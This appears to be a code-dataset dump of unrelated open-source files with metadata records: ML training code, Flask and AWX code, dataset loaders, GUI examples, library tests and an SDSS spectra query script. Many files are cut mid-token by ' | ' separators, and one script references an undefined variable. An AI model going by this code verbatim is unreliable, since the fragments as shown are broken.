n_hidden = int((n_obs / depth) / (alpha*(n_inputs+n_outputs)))
for i in range(1, depth-1):
widths[i] = n_hidden
model_str = ('\nalpha {} gamma {} batch size {} '
'n_hidden {} depth {}'
'\nnonlins {}'
'\ndrops {}'.format(alpha, gamma, batch_size,
n_hidden, depth, nonlins,
drops))
print model_str
# specify input and target theano data types
input_var = T.fmatrix('input')
target_var = T.ivector('target')
# build neural network model
network = build_network(input_var, shape, nonlins, depth, widths,
drops)
# create loss expression for training
"""
py_x = model(input_var, w_h, w_o)
y_x = T.argmax(py_x, axis=1)
cost = T.mean(T.nnet.categorical_crossentropy(py_x, target_var),
dtype=theano.config.floatX)
"""
prediction = lasagne.layers.get_output(network)
loss = lasagne.objectives.categorical_crossentropy(prediction,
target_var)
loss = loss.mean()
# create paraneter update expressions for training
"""
params = [w_h, w_o]
updates = sgd(cost, params, gamma=gamma)
"""
params = lasagne.layers.get_all_params(network, trainable=True)
updates = lasagne.updates.adadelta(loss, params,
learning_rate=gamma,
rho=decay_rate)
# create loss expression for validation and classification accuracy
# Deterministic forward pass to disable droupout layers
test_prediction = lasagne.layers.get_output(network,
deterministic=True)
test_loss = lasagne.objectives.categorical_crossentropy(
test_prediction,
target_var)
test_loss = test_loss.mean()
test_acc = T.mean(T.eq(T.argmax(test_prediction, axis=1),
target_var), dtype=theano.config.floatX)
# compile functions for performing training step and returning
# corresponding training loss
train_fn = theano.function(inputs=[input_var, target_var],
outputs=loss,
updates=updates,
allow_input_downcast=True)
# compile a function to compute the validation loss and accuracy
val_fn = theano.function(inputs=[input_var, target_var],
outputs=[test_loss, test_acc],
allow_input_downcast=True)
# create kfold iterator
kf = KFold(x_train.shape[0], n_folds=n_folds)
error_rates = []
val_losse |
jennywoites/MUSSA | MUSSA_Flask/manage.py | Python | gpl-3.0 | 879 | 0.003413 | """This file sets up a command line manager.
Use "python manage.py" for a list of available commands.
Use "python manage.py runserver" to start the development web server on localhost:5000.
Use "python manage.p | y runserver --help" for additional runserver options.
"""
from flask_migra | te import MigrateCommand
from flask_script import Manager, commands
from app import create_app
from app.commands import InitDbCommand
# Setup Flask-Script with command line commands
manager = Manager(create_app)
manager.add_command('db', MigrateCommand)
manager.add_command('init_db', InitDbCommand)
manager.add_command('runserver', commands.Server(host="0.0.0.0", port=None, threaded=True))
if __name__ == "__main__":
# python manage.py # shows available commands
# python manage.py runserver --help # shows available runserver options
manager.run()
|
OphidiaBigData/ophidia-wps-module | processes/__init__.py | Python | gpl-3.0 | 740 | 0.001351 | #
# Ophidia WPS Module
# Copyright (C) 2015-2021 CMCC Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free So | ftware Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You shoul | d have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
|
tonghuashuai/OnlyBoard | controller/_url.py | Python | mit | 68 | 0 | #!/usr/bin/env python
# | -*- coding: utf-8 -*-
import root
import j | |
Zardinality/TF_Deformable_Net | lib/datasets/pascal3d.py | Python | mit | 30,673 | 0.003293 | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
import xml.dom.minidom as minidom
import os
import PIL
import numpy as np
import scipy.sparse
import subprocess
import pickle
import math
import glob
import scipy.io as sio
from .imdb import imdb
from .imdb import ROOT_DIR
from ..utils.cython_bbox import bbox_overlaps
from ..utils.boxes_grid import get_boxes_grid
# TODO: make fast_rcnn irrelevant
# >>>> obsolete, because it depends on sth outside of this project
from ..fast_rcnn.config import cfg
from ..rpn_msr.generate_anchors import generate_anchors
# <<<< obsolete
class pascal3d(imdb):
def __init__(self, image_set, pascal3d_path = None):
imdb.__init__(self, 'pascal3d_' + image_set)
self._year = '2012'
self._image_set = image_set
self._pascal3d_path = self._get_default_path() if pascal3d_path is None \
else pascal3d_path
self._data_path = os.path.join(self._pascal3d_path, 'VOCdevkit' + self._year, 'VOC' + self._year)
self._classes = ('__background__', # always index 0
'aeroplane', 'bicycle', 'boat',
'bottle', 'bus', 'car', 'chair',
'diningtable', 'motorbike',
'sofa', 'train', 'tvmonitor')
self._class_to_ind = dict(list(zip(self.classes, list(range(self.num_classes)))))
self._image_ext = '.jpg'
self._image_index = self._load_image_set_index()
# Default to roidb handler
if cfg.IS_RPN:
self._roidb_handler = self.gt_roidb
else:
self._roidb_handler = self.region_proposal_roidb
# num of subclasses
if cfg.SUBCLS_NAME == 'voxel_exemplars':
self._num_subclasses = 337 + 1
elif cfg.SUBCLS_NAME == 'pose_exemplars':
self._num_subclasses = 260 + 1
else:
assert (1), 'cfg.SUBCLS_NAME not supported!'
# load the mapping for subcalss to class
filename = os.path.join(self._pascal3d_path, cfg.SUBCLS_NAME, 'mapping.txt')
assert os.path.exists(filename), 'Path does not exist: {}'.format(filename)
mapping = np.zeros(self._num_subclasses, dtype=np.int)
with open(filename) as f:
for line in f:
words = line.split()
subcls = int(words[0])
mapping[subcls] = self._class_to_ind[words[1]]
self._subclass_mapping = mapping
# PASCAL specific config options
self.config = {'cleanup' : True,
'use_salt' : True,
'top_k' : 2000}
# statistics for computing recall
self._num_boxes_all = np.zeros(self.num_classes, dtype=np.int)
self._num_boxes_covered = np.zeros(self.num_classes, dtype=np.int)
self._num_boxes_proposal = 0
assert os.path.exists(self._pascal3d_path), \
'PASCAL3D path does not exist: {}'.format(self._pascal3d_path)
assert os.path.exists(self._data_path), \
'Path does not exist: {}'.format(self._data_path)
def image_path_at(self, i):
"""
Return the absolute path to image i in the image sequence.
"""
return self.image_path_from_index(self._image_index[i])
def image_path_from_index(self, index):
"""
Construct an image path from the image's "index" identifier.
"""
image_path = os.path.join(self._data_path, 'JPEGImages',
index + self._image_ext)
assert os.path.exists(image_path), \
'Path does not exist: {}'.format(image_path)
return image_path
def _load_image_set_index(self):
"""
Load the indexes listed in this dataset's image set file.
"""
| # Example path to image set file:
# self._pascal3d_path + /VOCdevkit2012/VOC2012/ImageSets/Main/val.txt
image_set_file = os.path.join(self._data_path, 'ImageSets', 'Main',
self._image_set + '.txt')
assert os.path.exists(image_s | et_file), \
'Path does not exist: {}'.format(image_set_file)
with open(image_set_file) as f:
image_index = [x.strip() for x in f.readlines()]
return image_index
def _get_default_path(self):
"""
Return the default path where PASCAL3D is expected to be installed.
"""
return os.path.join(ROOT_DIR, 'data', 'PASCAL3D')
def gt_roidb(self):
"""
Return the database of ground-truth regions of interest.
This function loads/saves from/to a cache file to speed up future calls.
"""
cache_file = os.path.join(self.cache_path, self.name + '_' + cfg.SUBCLS_NAME + '_gt_roidb.pkl')
if os.path.exists(cache_file):
with open(cache_file, 'rb') as fid:
roidb = pickle.load(fid)
print('{} gt roidb loaded from {}'.format(self.name, cache_file))
return roidb
gt_roidb = [self._load_pascal3d_voxel_exemplar_annotation(index)
for index in self.image_index]
if cfg.IS_RPN:
# print out recall
for i in range(1, self.num_classes):
print('{}: Total number of boxes {:d}'.format(self.classes[i], self._num_boxes_all[i]))
print('{}: Number of boxes covered {:d}'.format(self.classes[i], self._num_boxes_covered[i]))
print('{}: Recall {:f}'.format(self.classes[i], float(self._num_boxes_covered[i]) / float(self._num_boxes_all[i])))
with open(cache_file, 'wb') as fid:
pickle.dump(gt_roidb, fid, pickle.HIGHEST_PROTOCOL)
print('wrote gt roidb to {}'.format(cache_file))
return gt_roidb
def _load_pascal_annotation(self, index):
"""
Load image and bounding boxes info from XML file in the PASCAL VOC
format.
"""
filename = os.path.join(self._data_path, 'Annotations', index + '.xml')
# print 'Loading: {}'.format(filename)
def get_data_from_tag(node, tag):
return node.getElementsByTagName(tag)[0].childNodes[0].data
with open(filename) as f:
data = minidom.parseString(f.read())
objs = data.getElementsByTagName('object')
num_objs = len(objs)
boxes = np.zeros((num_objs, 4), dtype=np.uint16)
gt_classes = np.zeros((num_objs), dtype=np.int32)
overlaps = np.zeros((num_objs, self.num_classes), dtype=np.float32)
# Load object bounding boxes into a data frame.
for ix, obj in enumerate(objs):
# Make pixel indexes 0-based
x1 = float(get_data_from_tag(obj, 'xmin')) - 1
y1 = float(get_data_from_tag(obj, 'ymin')) - 1
x2 = float(get_data_from_tag(obj, 'xmax')) - 1
y2 = float(get_data_from_tag(obj, 'ymax')) - 1
name = str(get_data_from_tag(obj, "name")).lower().strip()
if name in self._classes:
cls = self._class_to_ind[name]
else:
cls = 0
boxes[ix, :] = [x1, y1, x2, y2]
gt_classes[ix] = cls
overlaps[ix, cls] = 1.0
overlaps = scipy.sparse.csr_matrix(overlaps)
gt_subclasses = np.zeros((num_objs), dtype=np.int32)
gt_subclasses_flipped = np.zeros((num_objs), dtype=np.int32)
subindexes = np.zeros((num_objs, self.num_classes), dtype=np.int32)
subindexes_flipped = np.zeros((num_objs, self.num_classes), dtype=np.int32)
subindexes = scipy.sparse.csr_matrix(subindexes)
subindexes_flipped = scipy.sparse.csr_matrix(subindexes_flipped)
if cfg.IS_RPN:
if cfg.IS_MULTISCALE:
# compute overlaps between grid boxes and gt boxes in multi-scales
# rescale the gt boxes
boxes_all = np.zeros((0, 4), dtype=np.float32)
|
kreativitea/RandomData | utils.py | Python | mit | 739 | 0.005413 | import os
import json
try:
import yaml
except ImportError:
yaml = None
def r | oot():
''' Assuming that this function is in root.utils, returns the root directory
of the | project. '''
path, _ = os.path.split(__file__)
return os.path.abspath(path)
def loadfile(filename, _format=None):
''' Loads a file at a particular `filename` location. '''
with open(filename) as file:
data = file.read()
if not _format:
return data
elif _format=='json':
return json.loads(data)
elif _format=='yaml':
if yaml:
return yaml.load(data)
else:
print "yaml support is not currently installed."
elif _format=='split':
return data.split()
|
wwitzel3/awx | awx/main/tests/functional/api/test_job.py | Python | apache-2.0 | 9,725 | 0.003496 | # Python
import pytest
import mock
from dateutil.parser import parse
from dateutil.relativedelta import relativedelta
from crum import impersonate
import datetime
# Django rest framework
from rest_framework.exceptions import PermissionDenied
from django.utils import timezone
# AWX
from awx.api.versioning import reverse
from awx.api.views import RelatedJobsPreventDeleteMixin, UnifiedJobDeletionMixin
from awx.main.models import (
JobTemplate,
User,
Job,
AdHocCommand,
ProjectUpdate,
)
@pytest.mark.django_db
def test_extra_credentials(get, organization_factory, job_template_factory, credential):
objs = organization_factory("org", superusers=['admin'])
jt = job_template_factory("jt", organization=objs.organization,
inventory='test_inv', project='test_proj').job_template
jt.credentials.add(credential)
jt.save()
job = jt.create_unified_job()
url = reverse('api:job_extra_credentials_list', kwargs={'version': 'v2', 'pk': job.pk})
response = get(url, user=objs.superusers.admin)
assert response.data.get('count') == 1
@pytest.mark.django_db
def test_job_relaunch_permission_denied_response(
post, get, inventory, project, credential, net_credential, machine_credential):
jt = JobTemplate.objects.create(name='testjt', inventory=inventory, project=project)
jt.credentials.add(machine_credential)
jt_user = User.objects.create(username='jobtemplateuser')
jt.execute_role.members.add(jt_user)
with impersonate(jt_user):
job = jt.create_unified_job()
# User capability is shown for this
r = get(job.get_absolute_url(), jt_user, expect=200)
assert r.data['summary_fields']['user_capabilities']['start']
# Job has prompted extra_credential, launch denied w/ message
job.launch_config.credentials.add(net_credential)
r = post(reverse('api:job_relaunch', kwargs={'pk':job.pk}), {}, jt_user, expect=403)
assert 'launched with prompted fields' in r.data['detail']
assert 'do not have permission' in r.data['detail']
@pytest.mark.django_db
def test_job_relaunch_permission_denied_response_other_user(get, post, inventory, project, alice, bob):
'''
Asserts custom permission denied message corresponding to
awx/main/tests/functional/test_rbac_job.py::TestJobRelaunchAccess::test_other_user_prompts
'''
jt = JobTemplate.objects.create(
name='testjt', inventory=inventory, project=project,
ask_credential_on_launch=True,
ask_variables_on_launch=True)
jt.execute_role.members.add(alice, bob)
with impersonate(bob):
job = jt.create_unified_job(extra_vars={'job_var': 'foo2'})
# User capability is shown for this
r = get(job.get_absolute_url(), alice, expect=200)
assert r.data['summary_fields']['user_capabilities']['start']
# Job has prompted data, launch denied w/ message
r = post(reverse('api:job_relaunch', kwargs={'pk':job.pk}), {}, alice, expect=403)
assert 'Job was launched with prompts provided by another user' in r.data['detail']
@pytest.mark.django_db
def test_job_relaunch_without_creds(post, inventory, project, admin_user):
jt = JobTemplate.objects.create(
name='testjt', inventory=inventory,
project=project
)
job = jt.create_unified_job()
post(
url=reverse('api:job_relaunch', kwargs={'pk':job.pk}),
data={},
user=admin_user,
expect=201
)
@pytest.mark.django_db
@pytest.mark.parametrize("status,hosts", [
('all', 'host1,host2,host3'),
('failed', 'host3'),
])
def test_job_relaunch_on_failed_hosts(post, inventory, project, machine_credential, admin_user, status, hosts):
h1 = inventory.hosts.create(name='host1') # no-op
h2 = inventory.hosts.create(name='host2') # changed host
h3 = inventory.hosts.create(name='host3') # failed host
jt = JobTemplate.objects.create(
name='testjt', inventory=inventory,
project=project
)
jt.credentials.add(machine_credential)
job = jt.create_unified_job(_eager_fields={'status': 'failed'}, limit='host1,host2,host3')
job.job_events.create(event='playbook_on_stats')
job.job_host_summaries.create(host=h1, failed=False, ok=1, changed=0, failures=0, host_name=h1.name)
job.job_host_summaries.create(host=h2, failed=False, ok=0, changed=1, failures=0, host_name=h2.name)
job.job_host_summaries.create(host=h3, failed=False, ok=0, changed=0, failures=1, host_name=h3.name)
r = post(
url=reverse('api:job_relaunch', kwargs={'pk':job.pk}),
data={'hosts': status},
user=admin_user,
expect=201
)
assert r.data.get('limit') == hosts
@pytest.mark.django_db
def test_summary_fields_recent_jobs(job_template, admin_user, get):
jobs = []
for i in range(13):
jobs.append(Job.objects.create(
job_template=job_template,
status='failed',
created=timezone.make_aware(datetime.datetime(2017, 3, 21, 9, i)),
finished=timezone.make_aware(datetime.datetime(2017, 3, 21, 10, i))
))
r = get(
url = job_template.get_absolute_url(),
user = admin_user,
exepect = 200
)
recent_jobs = r.data['summary_fields']['recent_jobs']
assert len(recent_jobs) == 10
assert recent_jobs == [{
'id': job.id,
'status': 'failed',
'finished': job.finished,
'type': 'job'
} for job in jobs[-10:][::-1]]
@pytest.mark.django_db
def test_slice_jt_recent_jobs(slice_job_factory, admin_user, get):
workflow_job = slice_job_factory(3, spawn=True)
slice_jt = workflow_job.job_template
r = get(
url=slice_jt.get_absolute_url(),
user=admin_user,
expect=200
)
job_ids = [entry['id'] for entry in r.data['summary_fields']['recent_jobs']]
# decision is that workflow job should be shown in the related jobs
# joblets of the workflow job should NOT be shown
assert job_ids == [workflow_job.pk]
@pytest.mark.django_db
def test_block_unprocessed_events(delete, admin_user, mocker):
time_of_finish = parse("Thu Feb 28 09:10:20 2013 -0500")
job = Job.objects.create(
emitted_events=1,
status='finished',
finished=time_of_finish
)
request = mock.MagicMock()
class MockView(UnifiedJobDeletionMixin):
model = Job
def get_object(self):
return job
view = MockView()
time_of_request = time_of_finish + relativedelta(seconds=2)
with mock.patch('awx.api.views.mixin.now', lambda: time_of_request):
r = view.destroy(request)
assert r.status_code == 400
@pytest.mark.django_db
def test_block_related_unprocessed_events(mocker, organization, project, delete, a | dmin_user):
job_template | = JobTemplate.objects.create(
project=project,
playbook='helloworld.yml'
)
time_of_finish = parse("Thu Feb 23 14:17:24 2012 -0500")
Job.objects.create(
emitted_events=1,
status='finished',
finished=time_of_finish,
job_template=job_template,
project=project
)
view = RelatedJobsPreventDeleteMixin()
time_of_request = time_of_finish + relativedelta(seconds=2)
with mock.patch('awx.api.views.mixin.now', lambda: time_of_request):
with pytest.raises(PermissionDenied):
view.perform_destroy(organization)
@pytest.mark.django_db
def test_disallowed_http_update_methods(put, patch, post, inventory, project, admin_user):
jt = JobTemplate.objects.create(
name='test_disallowed_methods', inventory=inventory,
project=project
)
job = jt.create_unified_job()
post(
url=reverse('api:job_detail', kwargs={'pk': job.pk, 'version': 'v2'}),
data={},
user=admin_user,
expect=405
)
put(
url=reverse('api:job_detail', kwargs={'pk': job.pk, 'version': 'v2'}),
data={},
user=admin_user,
expect=405
)
patch(
url=reverse('api:job_detail', kwargs={'pk': job.pk, 'version': 'v2'}),
data={},
user=admin_user,
expect=405
)
class TestControlle |
pepsipepsi/nodebox_opengl_python3 | examples/10-gui/05-layout.py | Python | bsd-3-clause | 3,183 | 0.004713 | import os, sys
sys.path.insert(0, os.path.join("..",".."))
from nodebox.graphics impor | t *
from nodebox.gui.controls import *
# Comparison between Rows and Row containers.
# Both are subclasses of Layout.
# Panel 1
# Controls in a Rows layout are drawn below each other.
# Rows.width defines the width of all controls (individual width is ignored).
# Note how the second Field has a height and | wrap=True,
# which makes it a multi-line field with text wrapping.
panel1 = Panel("Panel 1", x=30, y=350)
panel1.append(
Rows([
Field(value="", hint="subject"),
Field(value="", hint="message", height=70, id="field_msg1", wrap=True),
Button("Send"),
], width=200)
)
panel1.pack()
# Panel 2
# Controls in a Row layout are drawn next to each other.
# Row.width defines the width of all controls (individual width is ignored).
# This means that each column has the same width.
# Note the align=TOP, which vertically aligns each column at the top (default is CENTER).
panel2 = Panel("Panel 2", x=30, y=200)
panel2.append(
Row([
Field(value="", hint="message", height=70, id="field_msg2", wrap=True),
Button("Send", width=400),
], width=200, align=TOP)
)
panel2.pack()
# Panel 3
# If you need columns of a different width, put a Layout in a column,
# in other words a Row or Rows nested inside a Row or Rows.
# Then put your controls in the nested layout,
# the layout's width will override the column width setting.
panel3 = Panel("Panel 3", x=30, y=30)
panel3.append(
Row([ # Field will be 200 wide, the Row column width setting.
Field(value="", hint="message", height=70, id="field_msg2", wrap=True),
("Actions:", Rows([
Button("Send"), # However, buttons will be 100 wide,
Button("Save") # because their Rows parent says so.
], width=100))
], width=200, align=TOP)
)
panel3.pack()
# Panel 4
# Without layouts, you are free to draw controls wherever you want in a panel.
# Panel.pack() will make sure that the panel fits snuggly around the controls.
# In this case, we place a button on the panel, with a field above it (hence y=40).
# The field has its own dimensions (width=300 and height=50).
panel4 = Panel("Panel 4", x=400, y=30)
panel4.extend([
Field(value="", hint="message", y=40, width=300, height=50, id="field_msg3", wrap=True, reserved=[]),
Button("Send")
])
panel4.pack()
# Note the reserved=[] with the field.
# By default, fields have ENTER and TAB keys reserved:
# enter fires Field.on_action(), tab moves away from the field.
# By clearing the reserved list we can type enter and tab inside the field.
# Panel 5
# If you don't pack the panel, you have to set its width and height manually,
# as well as the position of all controls:
panel5 = Panel("Panel 5", x=500, y=200, width=200, height=150)
panel5.extend([
Field(value="", hint="message", x=10, y=60, width=180, height=50, id="field_msg3", wrap=True),
Button("Send", x=10, y=20, width=180)
])
def draw(canvas):
canvas.clear()
canvas.append(panel1)
canvas.append(panel2)
canvas.append(panel3)
canvas.append(panel4)
canvas.append(panel5)
canvas.size = 800, 600
canvas.run(draw) |
libyal/libesedb | tests/pyesedb_test_file.py | Python | lgpl-3.0 | 5,223 | 0.006701 | #!/usr/bin/env python
#
# Python-bindings file type test script
#
# Copyright (C) 2009-2021, Joachim Metz <joachim.metz@gmail.com>
#
# Refer to AUTHORS for acknowledgements.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import argparse
import os
import sys
import unittest
import pyesedb
class FileTypeTests(unittest.TestCase):
"""Tests the file type."""
def test_signal_abort(self):
"""Tests the signal_abort function."""
esedb_file = pyesedb.file()
esedb_file.signal_abort()
def test_open(self):
"""Tests the open function."""
test_source = unittest.source
if not test_source:
raise unittest.SkipTest("missing source")
esedb_file = pyesedb.file()
esedb_file.open(test_source)
with self.assertRaises(IOError):
esedb_file.open(test_source)
esedb_file.close()
with self.assertRaises(TypeError):
esedb_file.open(None)
with self.assertRaises(ValueError):
esedb_file.open(test_source, mode="w")
def test_open_file_object(self):
"""Tests the open_file_object function."""
test_source = unittest.source
if not test_source:
raise unittest.SkipTest("missing source")
if not os.path.isfile(test_source):
raise unittest.SkipTest("source not a regular file")
esedb_file = pyesedb.file()
with open(test_source, "rb") as file_object:
esedb_file.open_file_object(file_object)
with self.assertRaises(IOError):
esedb_file.open_file_object(file_object)
esedb_file.close()
with self.assertRaises(TypeError):
esedb_file.open_file_object(None)
with self.assertRaises(ValueError):
esedb_file.open_file_object(file_object, mode="w")
def test_close(self):
"""Tests the close function."""
test_source = unittest.source
if not test_source:
raise unittest.SkipTest("missing source")
esedb_file = pyesedb.file()
with self.assertRaises(IOError):
esedb_file.close()
def test_open_close(self):
"""Tests the open and close functions."""
test_source = unittest.source
if not test_source:
return
esedb_file = pyesedb.file()
# Test open and close.
esedb_file.open(test_source)
esedb_file.close()
# Test open and close a second time to validate clean up on close.
esedb_file.open(test_source)
esedb_file.close()
if os.path.isfile(test_source):
with open(test_source, "rb") as file_object:
# Test open_file_object and close.
esedb_file.open_file_object(file_object)
esedb_file.close()
# Test open_file_object and close a second time to validate clean up on close.
esedb_file.open_file_object(file_object)
esedb_file.close()
# Test open_file_object and close and dereferencing file_object.
esedb_file.open_file_object(file_object)
del file_object
esedb_file.close()
def test_get_type(self):
"""Tests the get_type function and type property."""
test_source = unittest.source
if not test_source:
raise unittest.SkipTest("missing source")
esedb_file = pyesedb.file()
esedb_file.open(test_source)
type = esedb_file.get_type()
self.assertIsNotNone(type)
self.assertIsNotNone(esedb_file.type)
esedb_file.close()
def test_get_page_size(self):
"""Tests the get_page_size function and page_size property."""
test_source = unittest.source
if not test_source:
raise unittest.SkipTest("missing source")
esedb_file = pyesedb.file()
esedb_file.open(test_source)
page_size = esedb_file.get_page_size()
self.assertIsNotNone(page_size)
self.assertIsNotNone(esedb_file.page_size)
esedb_file.close()
def test_get_number_of_tables(self):
"""Tests the get_number_o | f_tables function and number_of_tables property."""
test_source = unittest.source
if not test_source:
raise unittest.SkipTest("missing source")
esedb_file = pyesedb.file()
esedb_file.open(test_source)
number_of_tables = esedb_file.get_number_of_tables()
self.as | sertIsNotNone(number_of_tables)
self.assertIsNotNone(esedb_file.number_of_tables)
esedb_file.close()
if __name__ == "__main__":
argument_parser = argparse.ArgumentParser()
argument_parser.add_argument(
"source", nargs="?", action="store", metavar="PATH",
default=None, help="path of the source file.")
options, unknown_options = argument_parser.parse_known_args()
unknown_options.insert(0, sys.argv[0])
setattr(unittest, "source", options.source)
unittest.main(argv=unknown_options, verbosity=2)
|
trilan/lemon-publications | publications/feeds.py | Python | isc | 334 | 0 | from django.contrib.syndication.views import Feed
from django.utils import feedgenerator
class PublicationFeed(Feed):
model = None
feed_type = | feedgenerator.Rss201rev2Feed
def items(self):
return self.model.objects.published()[:10]
def item_pubdat | e(self, item):
return item.publication_start_date
|
deapplegate/wtgpipeline | warp_the_pickle_new.py | Python | mit | 33,252 | 0.022735 | #!/usr/bin/env python
import sys, glob,astropy, astropy | .io.fits as pyfits, os.path
#from numpy import *
import scipy
import scipy.interpolate.interpolate as interp
#from readtxtfile import readtxtfile
#from optparse import OptionParser
c = 299792458e10 #Angstroms/s
def get_sdss_spectra(gmi,umg,gmr,imz,number=4,tol=0.01,S_N=5):
import sqlcl
dict_names = ['plate', 'MJD', 'fiberID', 'ra', 'dec', 'mag_0 | ', 'mag_1', 'mag_2']
#query = 'select top ' + str(number) + ' ' + reduce(lambda x,y: x + ',' + y, ['s.' + x for x in dict_names]) + ' from specobjall as s join specphotoall as p on s.specobjid = p.specobjid where abs(s.mag_0 - s.mag_1 - ' + str(gmr) + ') < ' + str(tol) + ' and abs(s.mag_1 - s.mag_2 - ' + str(rmi) + ') < ' + str(tol) + ' and abs(s.mag_0 - s.mag_2 - ' + str(gmr + rmi) + ') < ' + str(tol) + ' and s.sn_0 > ' + str(S_N) + ' and s.sn_1 > ' + str(S_N) + ' and s.sn_2 > ' + str(S_N) + ' and abs(s.mag_0 - s.mag_1 - (p.fibermag_g - p.fibermag_r)) < 0.1 and abs(s.mag_1 - s.mag_2 - (p.fibermag_r - p.fibermag_i)) < 0.1 order by -1.*s.sn_1'
if False: pattern = 'zbelodiesptype like "%v%" and zbelodiesptype not like "%var%"'
#elif 0.7 < rmi < 1.0: pattern = '(zbelodiesptype like "%G%v%" or zbelodiesptype like "%K%v%" or zbelodiesptype like "%M%v%")'
else:
pattern = 'zbelodiesptype like "%M%v%"'
''' try to approximately match u and z band stellar colors as well, not just spectroscopic magnitudes '''
query = "select top " + str(number) + " " + reduce(lambda x,y: x + "," + y, ["s." + x for x in dict_names]) + " \
from specobjall as s join specphoto as p on s.specobjid = p.specobjid join sppParams sp on sp.specobjid = s.specobjid \
where zbclass='STAR' and " + pattern + " and abs(s.mag_0 - s.mag_2 - " + str(gmi) + ") < " + str(tol) + " and \
abs(s.mag_0 - s.mag_1 - " + str(gmr) + ") < " + str(tol) + " and abs(s.mag_1 - s.mag_2 - " + str(gmi - gmr) + ") < " + str(tol) + " and \
s.sn_0 > " + str(S_N) + " and s.sn_1 > " + str(S_N) + " and s.sn_2 > " + str(S_N) + " and \
abs(s.mag_0 - s.mag_1 - (p.fibermag_g - p.fibermag_r)) < 0.1 and abs(s.mag_1 - s.mag_2 - (p.fibermag_r - p.fibermag_i)) < 0.1 \
and abs(p.fibermag_u - p.fibermag_g - " + str(umg) + ") < 0.1 and abs(p.fibermag_i - p.fibermag_z - " + str(imz) + ") < 0.1 \
order by -1.*s.sn_1"
if rmi < 0.7: pattern = 'zbelodiesptype like "%v%" and zbelodiesptype not like "%var%"'
#elif 0.7 < rmi < 1.0: pattern = '(zbelodiesptype like "%G%v%" or zbelodiesptype like "%K%v%" or zbelodiesptype like "%M%v%")'
else: pattern = 'zbelodiesptype like "%M%v%"'
query = 'select top ' + str(number) + ' ' + reduce(lambda x,y: x + ',' + y, ['s.' + x for x in dict_names]) + ' from specobjall as s join specphoto as p on s.specobjid = p.specobjid join sppParams sp on sp.specobjid = s.specobjid where zbclass="STAR" and ' + pattern + ' and abs(s.mag_0 - s.mag_1 - ' + str(gmr) + ') < ' + str(tol) + ' and abs(s.mag_1 - s.mag_2 - ' + str(rmi) + ') < ' + str(tol) + ' and abs(s.mag_0 - s.mag_2 - ' + str(gmr + rmi) + ') < ' + str(tol) + ' and s.sn_0 > ' + str(S_N) + ' and s.sn_1 > ' + str(S_N) + ' and s.sn_2 > ' + str(S_N) + ' and abs(s.mag_0 - s.mag_1 - (p.fibermag_g - p.fibermag_r)) < 0.1 and abs(s.mag_1 - s.mag_2 - (p.fibermag_r - p.fibermag_i)) < 0.1 and abs(' + str(umg) + ' - (p.psfMag_u - p.psfMag_g)) < 0.05 and abs(' + str(imz) + ' - (p.psfMag_i - p.psfMag_z)) < 0.05 \
order by -1.*s.sn_1'
#select top 100 zbclass, zbelodiesptype, zbsubclass from sppParams where zbsubclass like '%M%' and zbclass='STAR'
import time
time.sleep(1.5)
print query
lines = sqlcl.query(query).readlines()
print lines
dicts = []
if lines[0] != 'N':
for line in lines[1:]:
dict = {}
line = line.replace('\n','')
import re
res = re.split(',',line)
print res
for i in range(len(res)):
if dict_names[i] == 'fiberID' or dict_names[i] == 'plate' or dict_names[i] == 'MJD':
dict[dict_names[i]] = int(res[i])
else:
dict[dict_names[i]] = (res[i])
print dict
dicts.append(dict)
print dicts
return dicts
def retrieve_sdss_spectra(dict,plot=False):
dict['gmr'] = float(dict['mag_0']) - float(dict['mag_1'])
dict['rmi'] = float(dict['mag_1']) - float(dict['mag_2'])
print dict
file = "http://das.sdss.org/spectro/1d_26/%(plate)04d/1d/spSpec-%(MJD)d-%(plate)04d-%(fiberID)03d.fit" % dict
#output = "/tmp/spSpec-%(MJD)d-%(plate)04d-%(fiberID)d.fit" % dict
#os.system('wget ' + file + ' -O ' + output)
print file
import astropy, astropy.io.fits as pyfits, scipy
import scipy
p = pyfits.open(file)
mask = p[0].data[3]
flux = p[0].data[0]
indices = scipy.array(range(len(flux)))
#flux = flux[mask==0]
#indices = indices[mask==0]
#mask = mask[mask==0]
print mask
COEFF0 = p[0].header['COEFF0']
COEFF1 = p[0].header['COEFF1']
import scipy
wavelength = 10.**(COEFF0 + COEFF1*indices)
spectrum = []
for i in range(len(indices)):
spectrum.append([wavelength[i],flux[i]])
import scipy
spectrum = scipy.array(spectrum)
if plot:
import pylab
pylab.plot(spectrum[:,0], spectrum[:,1])
pylab.xlabel('angstroms')
pylab.ylabel('flux')
pylab.show()
return spectrum
def make_new_spectrum(locus_index,plot=False):
filters = get_filters()
import pickle
f = open('picklelocus_MACS','r')
m = pickle.Unpickler(f)
stars = m.load()
import string
spectra_complete = load_spectra()
locus_list = locus()
comp_list = filter(lambda x: string.find(x.replace('SDSS_',''),'SDSS')!=-1 and string.find(x,'SDSS_')!=-1, locus_list.keys())
print comp_list
import pylab
gmi_all = locus_list['GSDSS_ISDSS'][:]
umg_all = locus_list['USDSS_GSDSS'][:]
gmr_all = locus_list['GSDSS_RSDSS'][:]
imz_all = locus_list['ISDSS_ZSDSS'][:]
#locus_index = 13
print 'locus_index', locus_index
gmi = locus_list['GSDSS_ISDSS'][locus_index]
umg = locus_list['USDSS_GSDSS'][locus_index]
gmr = locus_list['GSDSS_RSDSS'][locus_index]
imz = locus_list['ISDSS_ZSDSS'][locus_index]
print gmi, umg, gmr, imz
if plot:
pylab.clf()
pylab.scatter(gmr_all,rmi_all,color='blue')
pylab.scatter(gmr,rmi,color='red')
pylab.show()
if False:
